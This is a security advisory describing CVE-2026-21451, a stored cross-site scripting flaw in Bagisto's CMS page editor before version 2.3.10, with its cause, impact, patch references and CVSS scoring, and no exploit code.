CVE-2026-21451

Bagisto Stored XSS: When the CMS Becomes a Skimmer's Paradise

Amit Schendel

Senior Security Researcher

Jan 2, 2026·6 min read·2 visits

PoC Available

Executive Summary (TL;DR)

Bagisto versions prior to 2.3.10 fail to sanitize HTML input on the server side within the CMS page editor. Developers relied on the WYSIWYG editor's client-side filtering, which can be trivially bypassed using a proxy. An attacker with CMS permissions can inject persistent JavaScript that executes for all visitors, leading to potential credit card skimming or session hijacking.

A classic 'client-side trust' failure in the Bagisto e-commerce platform allows privileged attackers to bypass HTML filters and inject malicious JavaScript. While requiring administrative access, this Stored XSS vulnerability poses a severe threat to storefront customers, enabling Magecart-style skimming attacks via the CMS page editor.

Attack Flow Diagram

Official Patches

BagistoBagisto v2.3.10 Release Notes

BagistoPull Request #11068 - Fix sanitize cms content xss

Fix Analysis (1)

Technical Appendix

CVSS Score

5.2/ 10

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:P

Affected Systems

Bagisto eCommerce PlatformLaravel Applications using vulnerable Bagisto packages

Affected Versions Detail

Product	Affected Versions	Fixed Version
Bagisto Webkul	< 2.3.10	2.3.10

Attribute	Detail
CWE ID	CWE-79
CVSS v4.0	5.2 (Medium)
Attack Vector	Network (Authenticated)
Privileges Required	High (Admin)
Impact	Stored XSS / Data Exfiltration
Fix Version	2.3.10